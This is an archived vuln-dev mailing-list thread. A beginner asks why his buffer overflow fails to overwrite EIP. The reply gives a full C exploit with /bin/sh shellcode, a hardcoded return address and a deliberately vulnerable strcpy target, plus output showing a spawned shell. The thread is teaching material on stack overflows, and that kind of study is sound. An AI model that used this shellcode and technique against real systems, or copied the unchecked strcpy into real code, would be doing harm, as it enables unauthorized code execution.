Re: understanding buffer overflows

From: adimitro@gmail.com
To: vuln-dev@securityfocus.com
Cc:
Subject: Re: understanding buffer overflows
Date:


Try this.. it is in C but you shouldn't have problems rewriting it.. 
In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer 

-- 
Best Regards,

Atanas


/*
 Overflow written for:

 x86 Pentium 4 
 Linux version 2.6.5-7.104-default
 gcc version 3.3.3 
 SuSE Linux
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>


#define MAX_BUF 530
#define RETADDR 0xbffff0c0

int main()
{
       int i;

   char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
     
      char buffer[MAX_BUF];
 
      // fill the buffer with the return address
    //the address to be overwritten is 524 bytes from the addr of buffer
  for (i=0; i<MAX_BUF; i+=4)

                  *(long *)&buffer[i] = RETADDR;

      memcpy(buffer, shellcode, sizeof(shellcode));
        buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00
        
      // I compiled the code provided as "vuln"

      execlp("./vuln", "vuln", buffer, NULL);
           
      exit(0);
}
   
/*

 OUTPUT:

***@localhost:~> ./test 
sh-2.05b$ exit
exit
***@localhost:~>

*/

OVERFLOWN CODE:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo (char *input)
{
  char buffer [512];
  
  strcpy(buffer, input);
  
  return (0);
}

int main (int argc, char * argv[])

{
  if (argc > 1)
    foo(argv[1]);
  else
    printf("usage: %s string", argv[0]);
 
  exit (0);
}

- Show quoted text -


On 31 Oct 2007 14:36:22 -0000, secacc7@hotmail.com <secacc7@hotmail.com> wrote:

    hello, my name is michael, im from austria - so my english is very bad.


    A few days ago i begin to experiment with bufferoverflows in linux.


    i wrote a little c++ programm like this:


    #include < string.h>


    void main()

    {

      char buffer[10];

      char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";

    strcpy((char *)buffer,(char *)COPY);


    }


    k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten


    so i put a few lines in the program to output addresses from functions and variables.


    addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)


    i think this is maybe the problem - but why?


    output from gdb:


    eax 0x0 0

    ecx 0x41414141 1094795585

    edx 0x1d7 471

    ebx 0xb7e27ff4 -1209892876

    esp 0x4141413d 0x4141413d

    ebp 0x41414141 0x41414141

    esi 0xb7f77ce0 -1208517408

    edi 0x0 0

    eip 0x80484ad 0x80484ad

    eflags 0x210286 [ PF SF IF RF ID ]

    cs 0x73 115

    ss 0x7b 123

    ds 0x7b 123

    es 0x7b 123

    fs 0x0 0

    gs 0x33 51



    hope anybody can help me understand/learn.


    greets from austria, michael





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.